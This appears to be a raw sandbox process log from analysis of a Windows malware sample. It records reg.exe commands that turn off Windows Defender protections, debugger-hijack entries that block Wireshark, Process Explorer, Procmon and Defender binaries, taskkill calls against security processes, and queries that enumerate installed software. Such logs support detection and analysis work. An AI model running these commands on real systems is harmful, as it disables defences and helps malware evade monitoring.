C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1692
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1080
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1788
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1612
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1056
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1516
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:580
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:288
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:680
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1908
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵PID:1408
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:1548
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1804
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:1328
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1828
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:320
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1576
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵PID:1900
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵PID:1992
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1916
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1836
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1628
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1860
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵PID:2044
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵PID:1892
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1868
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1824
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵PID:1212
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵PID:1896
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1356
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵PID:1988
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵PID:1560
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1520
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵PID:1796
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵PID:1580
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1340
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵PID:1524
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵PID:1916
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:320
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1344
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵PID:1068
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵PID:1836
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1932
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵PID:1892
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵PID:1624
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1884
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵PID:1468
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵PID:688
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2036
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵PID:1560
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵PID:1592
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1804
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵PID:1808
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵PID:1524
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:1916
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1040
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵PID:1544
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵PID:580
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1400
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵PID:660
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵PID:828
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1868
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:643⤵PID:1820
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:323⤵PID:1168
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1636
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵PID:328
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵PID:648
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1836
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵PID:1340
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵PID:1956
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:1632
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1936
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵PID:240
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵PID:1840
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1992
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:643⤵PID:1424
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:323⤵PID:1184
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1064
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵PID:1592
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵PID:1952
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1488
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵PID:1056
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵PID:660
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1472
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:643⤵PID:1168
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:323⤵PID:1980
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1136
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1260
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵PID:1788
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵PID:1520
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1672
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵PID:2044
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵PID:1840
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1624
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵PID:688
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵PID:1532
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1852
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:643⤵PID:2020
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:323⤵PID:1816
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1632
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:643⤵PID:1256
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:323⤵PID:1844
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1592
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:643⤵PID:1952
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:323⤵PID:1492
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:564
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:643⤵PID:1792
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:323⤵PID:1092
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1820
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:643⤵PID:1408
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:323⤵PID:1972
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:1644
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2032
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:643⤵PID:1048
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:323⤵PID:1788
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1520
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:643⤵PID:748
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:323⤵PID:1908
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:624
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:643⤵PID:1904
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:323⤵PID:328
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1892
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:643⤵PID:1356
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:323⤵PID:1580
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1488
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:643⤵PID:1832
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:323⤵PID:1636
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1768
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:643⤵PID:1040
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:323⤵PID:1560
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1836
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:643⤵PID:1916
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:323⤵PID:1424
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1992
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:792
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:643⤵PID:1816
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:323⤵PID:1524
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1844
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:643⤵PID:1964
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:323⤵PID:1616
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1056
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:643⤵PID:1792
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:323⤵PID:1984
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:324
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:643⤵PID:1088
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:323⤵PID:528
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1068
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:643⤵PID:2040
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:323⤵PID:820
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:288
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:643⤵PID:1788
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:323⤵PID:240
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1956
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:643⤵PID:1072
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:323⤵PID:1904
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1060
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:643⤵PID:1960
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:323⤵PID:1580
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1932
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:643⤵PID:1988
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:323⤵PID:1472
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:1040
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1344
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵PID:1888
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵PID:744
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2024
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵PID:1328
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵PID:1256
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1952
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵PID:1964
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵PID:1848
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:648
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:643⤵PID:1984
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:323⤵PID:1972
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2000
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵PID:1980
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵PID:2040
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1744
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:643⤵PID:1648
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:323⤵PID:320
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2044
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵PID:1072
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵PID:1896
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1948
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵PID:1580
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵PID:1636
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1976
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵PID:1780
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵PID:1424
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2020
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵PID:1116
